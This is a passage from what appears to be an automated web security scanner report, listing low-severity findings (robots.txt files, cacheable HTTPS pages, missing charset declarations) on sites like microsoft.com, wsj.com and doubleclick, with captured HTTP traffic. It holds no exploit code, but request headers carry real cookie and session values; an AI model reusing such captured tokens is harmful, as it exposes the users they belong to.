Date: Tue, 14 Jun 2011 00:16:30 GMT
Expires: Tue, 14 Jun 2011 00:16:30 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
25.75. http://www.microsoft.com/ie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /ie

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/plain
Last-Modified: Wed, 08 Jun 2011 17:21:48 GMT
Accept-Ranges: bytes
ETag: "b2239f8c026cc1:0"
Server: Microsoft-IIS/7.5
VTag: 279538132200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:08 GMT
Connection: keep-alive
Content-Length: 13503

# Robots.txt file for http://www.microsoft.com
#

User-agent: *
Disallow: /download/
Disallow: /*mnui=-1$
Disallow: /*mnui=1$
Disallow: /*mnui=2$
Disallow: /*mnui=3$
Disallow: /*mnui=4$
Disa
...[SNIP]...
25.76. http://www.mtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 31 Mar 2011 17:54:56 GMT
ETag: "4797a10-1cc-49fcafdbbdc00"
Accept-Ranges: bytes
Content-Length: 460
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Mon, 13 Jun 2011 17:45:32 GMT
Connection: close

Sitemap: http://www.mtv.com/sitemap_index.jhtml
User-agent: *
Disallow: /search/
Disallow: /*source=SEM_    
Disallow: /*partnersearch=
Disallow: /*searchterm=
Disallow: /*sicontent=
Disallow: /ne
...[SNIP]...
25.77. http://www.pega.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pega.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pega.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Tue, 31 May 2011 20:29:38 GMT
Cache-Control: max-age=1209600
Expires: Tue, 21 Jun 2011 16:08:57 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Content-Length: 1772
Date: Tue, 14 Jun 2011 12:27:53 GMT
X-Varnish: 238917795 111527708
Age: 591536
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 1201

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
26. Cacheable HTTPS response  previous  next
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

26.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /shopandbuy/order/subscribe.jsp

Request

GET /shopandbuy/order/subscribe.jsp?trackCode=aaagprmz HTTP/1.1
Host: buy.wsj.com
Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=571x47;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBPAPP_4_2_0_GA date=200706281411)/Tomcat-5.5
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 112017


                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
26.2. https://en.wordpress.com/lang-guess-ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /lang-guess-ajax.php

Request

GET /lang-guess-ajax.php?uri=%2Fsignup%2F&forums=0 HTTP/1.1
Host: en.wordpress.com
Connection: keep-alive
Referer: https://en.wordpress.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D; ref=bottomtext; TESTCOOKIE=home

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Content-Length: 0

26.3. https://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /signup/

Request

GET /signup/ HTTP/1.1
Host: en.wordpress.com
Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D; ref=bottomtext

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:48 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Vary: Accept-Encoding
Content-Length: 28577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="
...[SNIP]...
27. HTML does not specify charset  previous  next
There are 34 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

27.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.66.ALEXAINTERNET/B4971267

Request

GET /adi/N1558.66.ALEXAINTERNET/B4971267;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D959680%3Bx%3D2304%3Bg%3D172%3Bc%3D1219000019%2C1219000019%3Bi%3D0%3Bn%3D1219%3Bi%3D0%3Bu%3DlYrOTcGt89Yz1ao6zwEmLiof%7E051411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D1%3Bg%3D172%3Bw%3D51%3Bm%3D34%3Bq%3DALEXA_core%3Bz%3D0.7181504438631237%3Bk%3D;ord=0.5026219566352665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=19/1;w=300;h=250;d=9;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6780
Date: Tue, 14 Jun 2011 00:29:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
27.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N447.153730.YAHOO.COM/B5548365.27

Request

GET /adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gRvxSKzfqEbroTIaTR.s5w/A=6407512/R=0/*;ord=0.04136643558740616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 590
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 14:11:21 GMT
Expires: Mon, 13 Jun 2011 14:11:21 GMT
Discarded: true

<a target="_blank" href="http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL
...[SNIP]...
27.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6397
Date: Tue, 14 Jun 2011 00:16:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
27.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5621.66.2412875475321/B4682155

Request

GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=959677%3Bn=1219%3Bx=3853%3Bc=1219000048,1219000048%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=lYrOTcGt89Yz1ao6zwEmLiof~051411%3Bk%3D;ord=0.7221405794844031? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 826
Date: Tue, 14 Jun 2011 00:28:50 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/c/b7/%2a/p
...[SNIP]...
27.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 829
Date: Tue, 14 Jun 2011 00:13:48 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a
...[SNIP]...
27.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Request

GET /adi/interactive.wsj.com/tech_front;u=%5E%5ElA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1280
Date: Tue, 14 Jun 2011 00:13:50 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border=
...[SNIP]...
27.7. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Request

GET /adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=571x47;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1411
Date: Tue, 14 Jun 2011 00:14:11 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Control_Snippet_creative_w._login_571x47.gif" alt="" width="571"
...[SNIP]...
27.8. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

Request

GET /adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=atf;tag=adi;mtype=standard;sz=728x90;tile=2;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-atf%7Ctag-adi%7Cmtype-standard%7Csz-728x90%7Ctile-2%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 328
Date: Tue, 14 Jun 2011 00:17:53 GMT
Expires: Tue, 14 Jun 2011 00:22:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 to
...[SNIP]...
27.9. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

Request

GET /adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect;sec0=videos;sec1=mike-taylor;sec2=_659420;sec3=perfect;franchise=MTVMusicVideoPicksonOverdrive;franchise=MTVMusicVideoPicksonOverdrive;artist=Mike_Taylor;artist=Mike_Taylor;!category=expand;!category=float;!category=pop;!category=video;video_id=659420;partner=mv;content_id=1518072;pos=btf;tag=adi;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;!category=mv;!category=partner;u=franchise-MTVMusicVideoPicksonOverdrive%7Cfranchise-MTVMusicVideoPicksonOverdrive%7Cartist-Mike_Taylor%7Cartist-Mike_Taylor%7C!category-expand%7C!category-float%7C!category-pop%7C!category-video%7Cvideo_id-659420%7Cpartner-mv%7Ccontent_id-1518072%7Cpos-btf%7Ctag-adi%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774%7C!category-mv%7C!category-partner;ord=942670129658654300? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2187
Date: Tue, 14 Jun 2011 00:17:53 GMT
Expires: Tue, 14 Jun 2011 00:22:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 to
...[SNIP]...
27.10. http://ad.doubleclick.net/adi/mtv.mtvi/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/mtv.mtvi/survey

Request

GET /adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 293
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:17:17 GMT
Expires: Tue, 14 Jun 2011 00:22:17 GMT
Discarded: true

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>Advertisement</title></head><body marginheight=0 marginwidth=0 leftmargin=0 to
...[SNIP]...
27.11. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

